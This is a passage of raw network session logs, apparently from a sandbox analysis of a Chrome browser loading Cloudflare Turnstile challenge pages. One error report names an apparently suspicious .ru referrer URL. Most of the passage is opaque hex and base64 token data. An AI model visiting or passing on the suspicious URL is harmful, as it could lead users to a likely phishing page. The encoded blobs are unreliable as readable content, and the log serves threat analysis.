                                                                              Data Ascii: 6ucpaaxdHaqnI2Nerh/epd9v6+RgZuWtLStpMiPvbDQjL/O0KDPoqbQzKnVl9ie49nWudS759fdv9usz73G3cTzzcXj0eLM77Hx87jY39L0BbrjwfYA4gHg5N3Y2g/j3csVChgG1fTZCNb87vTsFN0cENfmJiMi6i3e6uouKiLuNS8VATT47wY6Ny769xUwGfwQGy8VSkQ9KC0vCB4RJSIiMTYNL1pRNjgpRllBSjMrPSRSO2BeJ0hhPk5fYyMp


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              22192.168.2.64984635.190.80.14436468C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-20 13:17:31 UTC480OUTPOST /report/v4?s=GA0KAF6bvAJqRzc9MT1TOuiCu7hTdqEDnnOwxXUGv9AwdQPkS7xFpUL%2BnFhtIWMNaUI3Z6mHq0oWe0I4VA8%2BVw17GcNYUd4ceEK%2BhcVdhPNeC5tDa%2FTmYZIaivx%2BYw%3D%3D HTTP/1.1
                                                                              Host: a.nel.cloudflare.com
                                                                              Connection: keep-alive
                                                                              Content-Length: 430
                                                                              Content-Type: application/reports+json
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2025-01-20 13:17:31 UTC430OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 31 31 38 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 68 62 76 2e 6a 75 6c 66 6f 6c 75 73 69 2e 72 75 2f 43 5a 38 4d 44 54 73 43 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 38 38 2e 31 31 34 2e 39 36 2e 33 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72
                                                                              Data Ascii: [{"age":0,"body":{"elapsed_time":118,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://hbv.julfolusi.ru/CZ8MDTsC/","sampling_fraction":1.0,"server_ip":"188.114.96.3","status_code":404,"type":"http.error"},"type":"network-error
                                                                              2025-01-20 13:17:31 UTC168INHTTP/1.1 200 OK
                                                                              Content-Length: 0
                                                                              date: Mon, 20 Jan 2025 13:17:30 GMT
                                                                              Via: 1.1 google
                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                              Connection: close


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              23192.168.2.649850104.18.95.414436468C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-20 13:17:32 UTC815OUTGET /cdn-cgi/challenge-platform/h/g/pat/904f584ecef78c84/1737379050574/6d3f33c5b10c262f317bed783b809dbc85efecad46729463c647b32eaa53d57b/QHQMfPl58w8-qkH HTTP/1.1
                                                                              Host: challenges.cloudflare.com
                                                                              Connection: keep-alive
                                                                              Cache-Control: max-age=0
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: same-origin
                                                                              Sec-Fetch-Mode: cors
                                                                              Sec-Fetch-Dest: empty
                                                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/1oqzy/0x4AAAAAAA1l_zHcax2l-m1D/auto/fbE/new/normal/auto/
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2025-01-20 13:17:32 UTC143INHTTP/1.1 401 Unauthorized
                                                                              Date: Mon, 20 Jan 2025 13:17:32 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              2025-01-20 13:17:32 UTC2015INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 62 54 38 7a 78 62 45 4d 4a 69 38 78 65 2d 31 34 4f 34 43 64 76 49 58 76 37 4b 31 47 63 70 52 6a 78 6b 65 7a 4c 71 70 54 31 58 73 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                                                              Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20gbT8zxbEMJi8xe-14O4CdvIXv7K1GcpRjxkezLqpT1XsAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                                                              2025-01-20 13:17:32 UTC1INData Raw: 4a
                                                                              Data Ascii: J


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              24192.168.2.649856104.18.94.414436468C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-20 13:17:32 UTC598OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/605860113:1737375097:AQtvdO2D1SMmkKmXHkUChIKLql2iCbTUUA-etS4QEUs/904f584ecef78c84/B7Z8_lZ1T490Z7ARD1SXfwmkxORwX0fuNibw7ixEi_o-1737379048-1.1.1.1-ksG.xkH.RsP6BvwjXLQHitp0UvG1mUMGZ.J0x1qPXVnRcS5LzaGrbFibeq1E6azf HTTP/1.1
                                                                              Host: challenges.cloudflare.com
                                                                              Connection: keep-alive
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: none
                                                                              Sec-Fetch-Mode: cors
                                                                              Sec-Fetch-Dest: empty
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2025-01-20 13:17:32 UTC442INHTTP/1.1 400 Bad Request
                                                                              Date: Mon, 20 Jan 2025 13:17:32 GMT
                                                                              Content-Type: application/json
                                                                              Content-Length: 14
                                                                              Connection: close
                                                                              cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              cf-chl-out: cMZKri7aHd0yhpWpOzT4xpmLAEjFMK99OnzDerGCaubuzSzU8J9ywqoGoB1OGSeV7K72FFbYuof7UVD+V5/1VA==$YUjkzChRP3Rqq5nyYRMc1w==
                                                                              Server: cloudflare
                                                                              CF-RAY: 904f5864693d423b-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              2025-01-20 13:17:32 UTC14INData Raw: 7b 22 65 72 72 22 3a 31 30 30 32 33 30 7d
                                                                              Data Ascii: {"err":100230}


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              25192.168.2.649857104.18.95.414436468C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-20 13:17:32 UTC786OUTGET /cdn-cgi/challenge-platform/h/g/d/904f584ecef78c84/1737379050574/WYedaWt9jSXybE_ HTTP/1.1
                                                                              Host: challenges.cloudflare.com
                                                                              Connection: keep-alive
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                              Sec-Fetch-Site: same-origin
                                                                              Sec-Fetch-Mode: no-cors
                                                                              Sec-Fetch-Dest: image
                                                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/1oqzy/0x4AAAAAAA1l_zHcax2l-m1D/auto/fbE/new/normal/auto/
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2025-01-20 13:17:32 UTC200INHTTP/1.1 200 OK
                                                                              Date: Mon, 20 Jan 2025 13:17:32 GMT
                                                                              Content-Type: image/png
                                                                              Content-Length: 61
                                                                              Connection: close
                                                                              Server: cloudflare
                                                                              CF-RAY: 904f5867a8104217-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              2025-01-20 13:17:32 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 60 00 00 00 4b 08 02 00 00 00 00 91 15 9a 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                              Data Ascii: PNGIHDR`KIDAT$IENDB`


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              26192.168.2.649863104.18.94.414436468C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-20 13:17:33 UTC428OUTGET /cdn-cgi/challenge-platform/h/g/d/904f584ecef78c84/1737379050574/WYedaWt9jSXybE_ HTTP/1.1
                                                                              Host: challenges.cloudflare.com
                                                                              Connection: keep-alive
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: none
                                                                              Sec-Fetch-Mode: cors
                                                                              Sec-Fetch-Dest: empty
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2025-01-20 13:17:33 UTC200INHTTP/1.1 200 OK
                                                                              Date: Mon, 20 Jan 2025 13:17:33 GMT
                                                                              Content-Type: image/png
                                                                              Content-Length: 61
                                                                              Connection: close
                                                                              Server: cloudflare
                                                                              CF-RAY: 904f586b9842c47c-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              2025-01-20 13:17:33 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 60 00 00 00 4b 08 02 00 00 00 00 91 15 9a 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                              Data Ascii: PNGIHDR`KIDAT$IENDB`


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              27192.168.2.649869104.18.95.414436468C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-20 13:17:34 UTC1175OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/605860113:1737375097:AQtvdO2D1SMmkKmXHkUChIKLql2iCbTUUA-etS4QEUs/904f584ecef78c84/B7Z8_lZ1T490Z7ARD1SXfwmkxORwX0fuNibw7ixEi_o-1737379048-1.1.1.1-ksG.xkH.RsP6BvwjXLQHitp0UvG1mUMGZ.J0x1qPXVnRcS5LzaGrbFibeq1E6azf HTTP/1.1
                                                                              Host: challenges.cloudflare.com
                                                                              Connection: keep-alive
                                                                              Content-Length: 33089
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              Content-type: application/x-www-form-urlencoded
                                                                              CF-Chl-RetryAttempt: 0
                                                                              sec-ch-ua-mobile: ?0
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              CF-Challenge: B7Z8_lZ1T490Z7ARD1SXfwmkxORwX0fuNibw7ixEi_o-1737379048-1.1.1.1-ksG.xkH.RsP6BvwjXLQHitp0UvG1mUMGZ.J0x1qPXVnRcS5LzaGrbFibeq1E6azf
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Accept: */*
                                                                              Origin: https://challenges.cloudflare.com
                                                                              Sec-Fetch-Site: same-origin
                                                                              Sec-Fetch-Mode: cors
                                                                              Sec-Fetch-Dest: empty
                                                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/1oqzy/0x4AAAAAAA1l_zHcax2l-m1D/auto/fbE/new/normal/auto/
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2025-01-20 13:17:34 UTC16384OUTData Raw: 76 5f 39 30 34 66 35 38 34 65 63 65 66 37 38 63 38 34 3d 67 74 59 46 25 32 62 6a 41 4b 31 71 74 32 74 4c 56 79 77 79 4f 79 37 4a 4c 4b 79 32 41 24 79 73 46 33 58 79 4b 79 55 46 71 38 73 79 57 79 31 46 36 58 6a 6a 79 63 46 36 59 79 4d 34 2d 79 64 6a 79 2d 72 46 79 6c 30 79 4c 4b 44 56 4c 79 4c 6b 79 70 46 71 4b 39 59 79 2d 58 41 67 79 48 31 79 34 58 70 5a 56 41 2d 79 4c 38 45 79 57 35 48 66 74 55 62 79 2d 48 4c 4d 79 38 72 2d 35 58 57 65 78 4f 55 79 58 46 2d 75 37 35 45 6a 79 79 44 47 79 67 66 48 47 35 45 24 79 6a 4e 57 6b 46 6a 4d 43 35 4e 42 79 4c 74 79 45 70 4c 79 4f 49 4a 53 44 50 4c 31 47 70 71 24 43 48 78 65 44 56 63 63 76 79 31 48 79 41 54 65 24 67 66 24 47 35 47 57 4e 32 72 65 47 64 5a 6b 69 4b 4d 6c 42 70 68 6e 47 56 54 34 2b 4b 55 4a 53 6e 33 41
                                                                              Data Ascii: v_904f584ecef78c84=gtYF%2bjAK1qt2tLVywyOy7JLKy2A$ysF3XyKyUFq8syWy1F6XjjycF6YyM4-ydjy-rFyl0yLKDVLyLkypFqK9Yy-XAgyH1y4XpZVA-yL8EyW5HftUby-HLMy8r-5XWexOUyXF-u75EjyyDGygfHG5E$yjNWkFjMC5NByLtyEpLyOIJSDPL1Gpq$CHxeDVccvy1HyATe$gf$G5GWN2reGdZkiKMlBphnGVT4+KUJSn3A
                                                                              2025-01-20 13:17:34 UTC16384OUTData Raw: 47 46 33 4e 4a 79 2d 6a 41 64 46 41 46 43 79 48 77 71 30 53 65 59 70 79 61 62 63 62 63 75 79 31 79 4d 79 4c 72 41 47 79 44 72 6a 73 41 57 79 67 6d 53 59 41 42 79 79 79 6a 34 66 79 4a 73 71 59 79 56 79 6e 70 4c 59 41 66 79 4f 72 41 74 79 54 41 4c 72 78 79 2d 70 79 43 6d 71 47 41 34 79 33 73 41 79 79 76 79 50 72 4a 55 79 2b 79 48 79 71 59 41 4b 79 6a 73 6a 57 79 6f 79 41 73 78 74 79 74 46 4f 79 79 42 41 67 6d 68 65 41 79 79 70 79 78 73 71 5a 79 73 79 6d 4b 4a 55 41 70 73 6d 4b 6a 31 41 76 79 68 72 71 42 79 73 79 36 46 36 37 61 65 79 4f 46 41 58 6a 35 79 78 65 71 42 41 4b 79 44 46 32 59 41 77 79 78 33 7a 72 69 35 79 51 72 41 6b 79 54 31 78 4b 71 55 79 73 79 68 72 4a 4c 2d 32 79 2b 46 32 58 6a 66 79 4a 72 59 33 69 57 48 58 46 4c 74 2d 77 79 38 4e 41 79 41 79
                                                                              Data Ascii: GF3NJy-jAdFAFCyHwq0SeYpyabcbcuy1yMyLrAGyDrjsAWygmSYAByyyj4fyJsqYyVynpLYAfyOrAtyTALrxy-pyCmqGA4y3sAyyvyPrJUy+yHyqYAKyjsjWyoyAsxtytFOyyBAgmheAyypyxsqZysymKJUApsmKj1AvyhrqBysy6F67aeyOFAXj5yxeqBAKyDF2YAwyx3zri5yQrAkyT1xKqUysyhrJL-2y+F2XjfyJrY3iWHXFLt-wy8NAyAy
                                                                              2025-01-20 13:17:34 UTC321OUTData Raw: 41 59 46 67 79 71 2b 73 4f 32 39 71 6a 33 79 6b 4c 61 66 61 5a 61 4e 62 76 33 65 73 79 4d 64 79 4b 35 54 6c 42 49 50 66 79 6d 53 5a 43 6c 71 4c 55 59 51 43 31 6d 79 61 49 4c 70 47 54 77 68 61 71 56 4f 68 47 49 53 4e 79 79 32 62 73 79 46 6f 63 61 41 32 79 2b 2b 37 30 7a 47 41 4e 79 42 32 6f 6b 36 78 4d 56 32 45 30 77 53 37 74 72 6a 74 31 6c 62 4f 32 6f 48 79 47 6f 56 32 4e 61 46 4e 44 57 4f 71 24 69 72 6f 6b 32 45 37 49 4b 6f 37 36 41 2d 64 79 6f 6c 2b 46 2b 49 31 6f 69 32 62 74 79 6c 62 43 32 45 77 7a 77 6f 66 49 61 33 64 46 6f 39 49 6f 2d 49 65 6f 63 32 45 75 72 44 6f 34 32 74 43 64 78 55 67 32 6f 43 64 44 6f 66 49 4e 54 64 4b 6f 56 32 39 49 41 50 75 57 71 59 6f 41 66 6f 31 49 6f 37 64 32 6f 34 49 39 7a 49 32 6f 4e 49 6b 43 49 72 79 43 49 39 5a 64 6a 6f
                                                                              Data Ascii: AYFgyq+sO29qj3ykLafaZaNbv3esyMdyK5TlBIPfymSZClqLUYQC1myaILpGTwhaqVOhGISNyy2bsyFocaA2y++70zGANyB2ok6xMV2E0wS7trjt1lbO2oHyGoV2NaFNDWOq$irok2E7IKo76A-dyol+F+I1oi2btylbC2EwzwofIa3dFo9Io-Ieoc2EurDo42tCdxUg2oCdDofINTdKoV29IAPuWqYoAfo1Io7d2o4I9zI2oNIkCIryCI9Zdjo
                                                                              2025-01-20 13:17:34 UTC322INHTTP/1.1 200 OK
                                                                              Date: Mon, 20 Jan 2025 13:17:34 GMT
                                                                              Content-Type: text/plain; charset=UTF-8
                                                                              Content-Length: 27180
                                                                              Connection: close
                                                                              cf-chl-gen: pygZxuW7Od2KLHGZbcKDWsE6OQfN6PMGSY7FXs5Jrq3833BgA8BiregwNth6Ri0O$xtVQnLk7XKJ/4ClN/sOl6w==
                                                                              Server: cloudflare
                                                                              CF-RAY: 904f587159f14369-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              2025-01-20 13:17:34 UTC1047INData Raw: 6f 6f 43 7a 67 70 61 53 74 70 61 68 70 63 61 55 70 35 36 39 78 4b 4b 6d 75 36 76 4c 6b 37 2b 76 7a 35 62 4c 78 73 36 61 6b 64 37 63 73 64 43 34 35 65 66 41 30 72 2f 72 6f 38 72 4a 79 74 36 72 7a 65 58 4e 72 4b 33 4b 72 64 50 34 35 4c 58 5a 2f 76 6a 58 7a 2f 62 35 2f 74 50 61 39 4c 34 43 31 4c 7a 38 41 2b 58 61 36 66 45 51 44 4d 6e 67 46 75 38 45 46 78 4c 53 42 76 54 50 36 4e 6f 66 32 78 34 54 49 42 48 32 4a 66 7a 6e 46 65 48 33 37 53 38 45 4a 69 44 73 4c 79 72 2b 45 51 50 30 44 7a 55 39 44 52 77 7a 47 68 41 42 39 43 50 37 2f 52 77 39 4e 41 59 32 41 67 55 4f 46 79 49 70 51 79 4d 4c 56 52 41 73 51 78 49 6d 4f 46 4d 73 50 44 6f 5a 55 55 6f 34 51 7a 45 33 48 6c 49 6f 51 53 49 39 4e 6b 55 2b 53 43 78 49 55 45 70 55 53 32 70 45 59 6b 4e 36 63 54 30 39 56 54 78
                                                                              Data Ascii: ooCzgpaStpahpcaUp569xKKmu6vLk7+vz5bLxs6akd7csdC45efA0r/ro8rJyt6rzeXNrK3KrdP45LXZ/vjXz/b5/tPa9L4C1Lz8A+Xa6fEQDMngFu8EFxLSBvTP6Nof2x4TIBH2JfznFeH37S8EJiDsLyr+EQP0DzU9DRwzGhAB9CP7/Rw9NAY2AgUOFyIpQyMLVRAsQxImOFMsPDoZUUo4QzE3HlIoQSI9NkU+SCxIUEpUS2pEYkN6cT09VTx
                                                                              2025-01-20 13:17:34 UTC1369INData Raw: 4c 78 4a 4f 30 79 4c 62 45 70 72 36 63 71 5a 66 53 77 38 43 2b 77 64 57 78 78 4b 44 5a 74 63 7a 4a 72 72 2f 4d 34 2b 57 38 36 4e 2b 2b 30 37 50 4c 32 72 76 57 39 75 75 32 75 75 37 52 41 74 54 76 34 75 4c 47 78 73 66 44 41 77 44 65 78 2b 51 44 36 67 48 69 33 2b 49 46 36 4f 50 4d 30 38 37 34 48 67 44 37 37 53 41 4d 4a 43 45 48 4b 41 55 47 34 67 41 47 49 52 6f 45 43 69 59 51 42 78 41 44 47 41 30 53 47 2f 45 53 38 77 67 59 4d 44 30 38 2f 54 34 6b 4f 41 63 53 49 44 34 4c 4b 43 63 72 4c 43 59 73 55 30 4e 48 51 7a 45 51 54 6b 4d 55 57 30 67 74 4d 57 41 76 47 43 77 6a 50 54 39 5a 55 6a 74 46 4e 7a 6f 37 51 30 59 71 61 43 64 68 55 57 70 43 54 6c 4a 6a 56 6a 42 6b 64 55 70 4e 56 48 68 72 59 48 4a 74 63 45 46 52 67 6e 52 62 5a 55 4a 48 69 6d 5a 50 62 30 74 6b 64 58
                                                                              Data Ascii: LxJO0yLbEpr6cqZfSw8C+wdWxxKDZtczJrr/M4+W86N++07PL2rvW9uu2uu7RAtTv4uLGxsfDAwDex+QD6gHi3+IF6OPM0874HgD77SAMJCEHKAUG4gAGIRoECiYQBxADGA0SG/ES8wgYMD08/T4kOAcSID4LKCcrLCYsU0NHQzEQTkMUW0gtMWAvGCwjPT9ZUjtFNzo7Q0YqaCdhUWpCTlJjVjBkdUpNVHhrYHJtcEFRgnRbZUJHimZPb0tkdX
                                                                              2025-01-20 13:17:34 UTC1369INData Raw: 79 4a 6a 64 33 62 54 51 73 5a 57 79 7a 70 7a 66 36 4f 66 69 32 64 7a 6c 36 65 6a 78 72 36 6a 7a 72 2f 4f 2f 35 74 61 78 36 66 6e 77 38 4f 33 67 34 50 62 66 75 38 54 50 7a 77 50 69 35 73 72 45 36 75 6f 49 34 67 6b 50 41 68 4c 30 39 74 48 69 2b 42 48 5a 34 2b 67 49 47 69 45 62 46 68 6a 37 49 78 4d 63 4a 39 34 42 4b 79 6a 31 37 66 63 4f 36 41 50 6f 41 75 77 55 42 50 45 5a 4c 6a 41 70 2b 43 6f 4f 2b 66 34 35 4f 68 38 55 4f 67 38 41 46 30 70 41 4b 55 64 47 51 7a 70 4a 48 77 35 41 45 30 35 50 4a 6c 52 49 4a 79 52 58 56 31 68 4a 4d 54 46 56 57 69 51 39 56 6c 74 4b 56 56 68 43 48 30 30 6c 52 32 68 41 4b 32 42 76 53 57 68 4e 65 47 77 33 57 46 6c 48 62 57 39 53 64 6a 38 39 62 31 31 31 56 31 4a 34 52 6d 64 5a 57 33 36 43 5a 6e 2b 53 6b 32 68 4f 6a 6d 52 32 6b 70 52
                                                                              Data Ascii: yJjd3bTQsZWyzpzf6Ofi2dzl6ejxr6jzr/O/5tax6fnw8O3g4Pbfu8TPzwPi5srE6uoI4gkPAhL09tHi+BHZ4+gIGiEbFhj7IxMcJ94BKyj17fcO6APoAuwUBPEZLjAp+CoO+f45Oh8UOg8AF0pAKUdGQzpJHw5AE05PJlRIJyRXV1hJMTFVWiQ9VltKVVhCH00lR2hAK2BvSWhNeGw3WFlHbW9Sdj89b111V1J4RmdZW36CZn+Sk2hOjmR2kpR
                                                                              2025-01-20 13:17:34 UTC1369INData Raw: 74 79 73 77 4d 62 6a 35 72 6a 6d 34 73 4c 69 35 4e 76 44 34 4c 47 75 79 66 4f 30 39 36 2f 71 35 2b 7a 45 2b 72 54 77 37 2b 48 35 77 2f 44 33 39 4e 66 48 32 67 66 71 42 64 73 51 7a 64 6a 4d 36 74 34 46 39 42 67 44 44 38 76 59 46 75 59 63 32 76 45 69 37 77 34 67 39 50 30 58 34 4e 72 7a 42 2b 67 6e 33 79 63 68 49 75 38 42 46 54 41 6b 45 52 55 76 38 50 41 61 43 69 63 59 4b 7a 59 76 39 44 67 6d 42 53 45 64 4a 66 73 4c 42 55 55 6e 4b 52 41 5a 49 77 6b 69 43 79 67 77 55 31 52 49 44 54 6f 34 56 6a 39 4e 4d 42 30 64 47 7a 55 6a 52 6b 46 64 57 32 59 38 48 31 67 68 4c 53 68 53 58 6a 52 68 55 6a 64 57 56 56 4a 6f 4d 69 39 6f 4e 56 67 34 59 6d 35 42 68 49 57 49 65 47 5a 42 66 45 52 36 69 32 6c 6e 62 30 39 4c 63 32 64 6f 54 34 43 48 68 49 61 56 65 31 69 58 58 31 31 69
                                                                              Data Ascii: tyswMbj5rjm4sLi5NvD4LGuyfO096/q5+zE+rTw7+H5w/D39NfH2gfqBdsQzdjM6t4F9BgDD8vYFuYc2vEi7w4g9P0X4NrzB+gn3ychIu8BFTAkERUv8PAaCicYKzYv9DgmBSEdJfsLBUUnKRAZIwkiCygwU1RIDTo4Vj9NMB0dGzUjRkFdW2Y8H1ghLShSXjRhUjdWVVJoMi9oNVg4Ym5BhIWIeGZBfER6i2lnb09Lc2doT4CHhIaVe1iXX11i
                                                                              2025-01-20 13:17:34 UTC1369INData Raw: 47 6a 78 38 66 71 31 71 57 35 77 71 76 6c 30 38 62 52 79 50 6a 57 39 50 4f 32 32 76 6a 4b 36 4e 58 32 77 50 62 61 39 77 50 45 41 73 66 43 42 2b 41 41 32 42 41 45 7a 76 48 77 33 67 55 4e 36 51 37 57 48 42 6f 4c 36 52 34 58 34 50 6a 5a 33 52 6a 7a 38 42 33 7a 48 65 51 6c 2f 69 62 2b 2f 69 48 78 4c 41 54 31 42 65 34 5a 38 7a 50 74 44 53 38 53 46 54 45 54 48 54 59 33 41 77 63 32 48 7a 49 4c 42 6a 73 6c 51 53 67 6a 48 53 67 68 44 6b 77 6e 52 53 78 56 4d 56 68 56 47 68 78 5a 4f 6b 41 35 48 6b 41 2b 58 55 59 79 5a 57 4e 65 59 54 38 68 54 45 35 51 4c 56 52 46 53 31 4a 46 62 44 41 74 65 32 56 4c 53 46 4e 50 54 58 78 62 65 46 45 39 68 6b 52 66 52 59 5a 5a 62 49 36 48 63 47 43 48 59 35 4f 56 64 70 57 52 63 59 31 6f 56 6e 43 48 69 4a 61 44 68 49 4f 4f 58 4b 42 77 64
                                                                              Data Ascii: Gjx8fq1qW5wqvl08bRyPjW9PO22vjK6NX2wPba9wPEAsfCB+AA2BAEzvHw3gUN6Q7WHBoL6R4X4PjZ3Rjz8B3zHeQl/ib+/iHxLAT1Be4Z8zPtDS8SFTETHTY3Awc2HzILBjslQSgjHSghDkwnRSxVMVhVGhxZOkA5HkA+XUYyZWNeYT8hTE5QLVRFS1JFbDAte2VLSFNPTXxbeFE9hkRfRYZZbI6HcGCHY5OVdpWRcY1oVnCHiJaDhIOOXKBwd
                                                                              2025-01-20 13:17:34 UTC1369INData Raw: 47 36 71 6e 77 76 38 58 79 38 50 50 57 79 66 50 45 31 66 48 30 79 76 66 78 34 4c 72 52 30 63 48 46 34 51 50 46 2b 41 30 47 43 38 4c 6d 7a 77 6f 48 39 67 73 59 35 64 55 53 39 66 62 79 37 2f 48 76 46 68 30 5a 37 50 30 62 46 77 4c 33 48 42 2f 32 4b 2b 77 65 48 43 51 69 43 41 38 67 4a 67 34 6d 42 42 73 64 4b 41 77 64 46 67 48 7a 44 6b 55 56 4c 30 41 30 43 43 45 31 54 43 41 6b 52 54 38 4d 45 6b 68 56 55 55 63 6a 55 54 5a 48 57 56 73 76 48 42 70 55 4e 56 30 34 58 46 49 32 58 30 4a 66 58 53 64 57 56 30 5a 42 53 57 5a 45 62 56 35 7a 4b 44 55 78 51 56 4a 77 50 44 64 76 4f 30 31 35 59 30 31 36 64 48 78 51 58 57 57 4c 52 6f 64 4b 59 6d 35 71 61 6d 71 52 67 32 53 51 55 6e 5a 68 6c 6d 68 6c 63 35 4e 62 55 70 56 65 57 31 61 41 6d 4b 5a 78 66 61 42 35 70 71 47 75 72 37
